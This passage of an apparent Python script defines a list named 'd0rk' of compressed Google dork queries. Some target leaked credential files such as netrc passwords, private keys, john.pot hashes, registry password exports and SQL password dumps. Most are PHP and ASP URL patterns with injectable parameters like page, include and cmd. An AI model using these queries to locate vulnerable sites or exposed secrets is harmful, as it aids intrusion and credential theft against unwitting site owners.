'filetypenetrcpassword', 'filetypens1ns1', 'filetypeoraora',
'filetypeoratnsnames', 'filetypeotjohn.pot',
'filetypepasspassintextuserid', 'filetypepdbpdbbackupPilot|Pluckerdb',
'filetypepdfAssessmentReportnessus', 'filetypepemintextprivate',
'filetypephpindexphpicalendarsitesourceforge.net',
'filetypephpipinfo.phpDistributedIntrusionDetectionSystem',
'filetypephplogging.phpDiscuzerror',
'filetypephpnqtintextNetworkQueryTool', 'filetypephpvAuthenticate',
'filetypephpwebeditor.php',
'filetypeplDownloadSuSELinuxOpenexchangeServerCA',
'filetypeplUltraboardSetup', 'filetypepotjohn.pot',
'filetypepropertiesdbintextpassword', 'filetypepstoutlook.pst',
'filetypepstpstfromtodate', 'filetypepwdservice', 'filetypepwlpwl',
'filetypeqbbqbb', 'filetyper2wr2w', 'filetyperaora',
'filetyperaorafiletypedbpdbbackupPilot|Pluckerdb', 'filetyperdprdp',
'filetyperdprdpRemoteDesktopConnectionfilesrevealuser',
'filetyperegTerminalServerClient',
'filetyperegregHKEYCURRENTUSERSSHHOSTKEYS',
'filetyperegregHKEYWindowsRegistryexportscanreveal',
'filetyperegregintext?WINVNC3?',
'filetyperegregintextMicrosoftInternetAccountManagercan',
'filetyperegregintextdefaultusernameintextdefaultpassword',
'filetyperegregintext�?WINVNC3�?', 'filetypesqlIDENTIFIEDBYcvs',
'filetypesqlinsertintopass|passwd|password', 'filetypesqlpassword',
'filetypesqlvaluesMD5|valuespassword|valuesencrypt',
'filetypesqlvaluesMD5�|valuespassword|valuesencrypt',
'filetypestoutlook.pst', 'filetypestpstfromtodate',
'filetypeurlftp//;', 'filetypevcsvcs',
'filetypevsdvsdnetworksamplesexamples', 'filetypewabwab',
'filetypewabwabMicrosoftOutlookExpressMailaddress',
'filetypexlsemail.xls', 'filetypexlssitegovcontact',
'filetypexlsusernamepasswordemail', 'filezilla.xmlcvs',
'films.php?id', 'finalrevdisplay.php?id', 'finger', 'firmid',
'fitxa.php?id', 'folder.php?id', 'fonts/details.php?id',
'footer.inc.php', 'formmail.cgi', 'forum', 'forum.php?act',
'forum.php?seitephp?seite', 'forum/index.php?topic',
'forum/profile.asp?id', 'forum/profile.php?id' ]
d0rk += [ 'forum/showProfile.asp?id', 'forum/showProfile.php?id',
'forum/showthread.php?p', 'forum/showthread.php?t',
'forum/viewtopic.php?TopicID', 'forum/viewtopic.php?id',
'forum/viewtopic.php?t', 'forumapc/plantfinder/details.php?id',
'forumbds.php?num', 'forumfiletypemdb', 'forums/index.php?page',
'forums/index.php?topic', 'forums/search.php?do',
'forums/showthread.php?t', 'forwardfiletypeforwardcvs', 'fpcount.exe',
'fr/commandelistecategorie.asp?panier',
'fr/commandelistecategorie.php?panier', 'frag.php?execfrag.php',
'frag.php?execfrag.php?exec', 'frag.php?execphp?exec',
'frame.php?locphp?loc', 'franchise2.php?id',
'freeboard/boardview.html?page', 'freedownload.asp?bookid',
'freedownload.cfm?bookid', 'freedownload.php?bookid',
'freerelease.php?id', 'frf10/news.php?id',
'front/bin/forumview.phtml?bbcode',
'frontend/category.asp?idcategory',
'frontend/category.php?idcategory', 'fshstatistic/index.asp?PID',
'fshstatistic/index.php?&PID', 'fshstatistic/index.php?PID',
'ftp//www.eastgame.net', 'fullDisplay.asp?item',
'fullDisplay.cfm?item', 'fullDisplay.php?item',
'functions.php?prefix', 'galerie.asp?cid', 'galerie.php?cid',
'galerie.php?dophp?do', 'galeriinfo.php?l', 'gallery.asp?id',
'gallery.php?[]', 'gallery.php?abre', 'gallery.php?action',
'gallery.php?addr', 'gallery.php?basedir', 'gallery.php?basepath',
'gallery.php?chapter', 'gallery.php?cont', 'gallery.php?corpo',
'gallery.php?disp', 'gallery.php?ev', 'gallery.php?eval',
'gallery.php?filepath', 'gallery.php?get', 'gallery.php?go',
'gallery.php?h', 'gallery.php?id', 'gallery.php?index',
'gallery.php?itemnav', 'gallery.php?ki', 'gallery.php?left',
'gallery.php?loader', 'gallery.php?menu', 'gallery.php?menue',
'gallery.php?mid', 'gallery.php?mod', 'gallery.php?module',
'gallery.php?my', 'gallery.php?name', 'gallery.php?nivel',
'gallery.php?oldal', 'gallery.php?open', 'gallery.php?option',
'gallery.php?pag', 'gallery.php?page', 'gallery.php?pageweb',
'gallery.php?panel', 'gallery.php?param', 'gallery.php?pg',
'gallery.php?phpbbrootpath', 'gallery.php?pname',
'gallery.php?pollname', 'gallery.php?pre', 'gallery.php?pref',
'gallery.php?qry', 'gallery.php?redirect', 'gallery.php?ref',
'gallery.php?rub', 'gallery.php?sec', 'gallery.php?secao',
'gallery.php?seccion', 'gallery.php?seite', 'gallery.php?showpage',
'gallery.php?sivu', 'gallery.php?sp', 'gallery.php?strona',
'gallery.php?thispage', 'gallery.php?tipo', 'gallery.php?to',
'gallery.php?url', 'gallery.php?var', 'gallery.php?viewpage',
'gallery.php?where', 'gallery.php?xlink', 'gallery.php?y',
'gallery/categoria.php?idcat', 'gallery/detail.asp?ID',
'gallery/detail.php?ID', 'gallery/gallery.asp?id',
'gallery/gallery.php?id', 'gallery/mailmanager/subscribe.php?ID',
'gallerysort.asp?iid', 'gallerysort.php?iid', 'game.php?id',
'games.php?id', 'games/index.php?task', 'games/play.php?id',
'gardenequipment/FruitCage/product.asp?pr',
'gardenequipment/FruitCage/product.php?pr',
'gardenequipment/pestweedcontrol/product.asp?pr',
'gardenequipment/pestweedcontrol/product.php?pr',
'gb/comment.asp?gbid', 'gb/comment.php?gbid', 'general.asp?id',
'general.php?abre', 'general.php?addr', 'general.php?adresa',
'general.php?b', 'general.php?basedir', 'general.php?body',
'general.php?channel', 'general.php?chapter', 'general.php?choix',
'general.php?cmd', 'general.php?content', 'general.php?doshow',
'general.php?e', 'general.php?f', 'general.php?get',
'general.php?goto', 'general.php?header', 'general.php?id',
'general.php?inc', 'general.php?include', 'general.php?ir',
'general.php?itemnav', 'general.php?left', 'general.php?link',
'general.php?menu', 'general.php?menue', 'general.php?mid',
'general.php?middle', 'general.php?modo', 'general.php?module',
'general.php?my', 'general.php?name', 'general.php?nivel',
'general.php?opcion', 'general.php?p', 'general.php?page',
'general.php?pageweb', 'general.php?pollname', 'general.php?pr',
'general.php?pre', 'general.php?qry', 'general.php?read',
'general.php?redirect', 'general.php?ref', 'general.php?rub',
'general.php?secao', 'general.php?seccion', 'general.php?second',
'general.php?section', 'general.php?seite', 'general.php?sekce',
'general.php?sivu', 'general.php?strona', 'general.php?subject',
'general.php?texto', 'general.php?thispage', 'general.php?tipo',
'general.php?to', 'general.php?type', 'general.php?var',
'general.php?w', 'general.php?where', 'general.php?xlink',
'general/blogpost/?p', 'generatedbywwwstat', 'gery.php?',
'gery.php?[]', 'gery.php?abre', 'gery.php?action', 'gery.php?addr',
'gery.php?basedir', 'gery.php?basepath', 'gery.php?chapter',
'gery.php?cont', 'gery.php?corpo', 'gery.php?disp', 'gery.php?ev',
'gery.php?eval', 'gery.php?filepath', 'gery.php?get', 'gery.php?go',
'gery.php?h', 'gery.php?id', 'gery.php?index', 'gery.php?itemnav',
'gery.php?ki', 'gery.php?left', 'gery.php?loader', 'gery.php?menu',
'gery.php?menue', 'gery.php?mid', 'gery.php?mod', 'gery.php?module',
'gery.php?my', 'gery.php?name', 'gery.php?nivel', 'gery.php?oldal',
'gery.php?open', 'gery.php?option', 'gery.php?pag', 'gery.php?page',
'gery.php?pageweb', 'gery.php?panel', 'gery.php?param', 'gery.php?pg'
]
d0rk += [ 'gery.php?phpbbrootpath', 'gery.php?pname',
'gery.php?pollname', 'gery.php?pre', 'gery.php?pref', 'gery.php?qry',
'gery.php?redirect', 'gery.php?ref', 'gery.php?rub', 'gery.php?sec',
'gery.php?secao', 'gery.php?seccion', 'gery.php?seite',
'gery.php?showpage', 'gery.php?sivu', 'gery.php?sp',
'gery.php?strona', 'gery.php?thispage', 'gery.php?tipo',
'gery.php?to', 'gery.php?url', 'gery.php?var', 'gery.php?viewpage',
'gery.php?where', 'gery.php?xlink', 'gery.php?y',
'gery/init.php?HTTPPOSTVARS', 'getFile.cfm', 'getbook.asp?bookid',
'getbook.cfm?bookid', 'getbook.php?bookid', 'getdata',
'getmsg.htmlhotmail', 'giftDetail.asp?id', 'giftDetail.cfm?id',
'giftDetail.php?id', 'giftshop/product.php?proid', 'gig.asp?id',
'gig.php?id', 'glimpse', 'global.cgi', 'global.inc',
'global/product/product.asp?gubun',
'global/product/product.php?gubun', 'globalprojects.asp?cid',
'globalprojects.php?cid', 'glossary.php?termphp?term', 'gnatsweb.pl',
'gnu/?doc', 'goboard/front/boardview.asp?code',
'goboard/front/boardview.php?code', 'goodsdetail.asp?data',
'goodsdetail.php?data', 'goodsdetail.php?goodsIdx',
'googlekietu/hitjs.phpallkietu/hitjs.php', 'goto.php?areaid',
'grademade']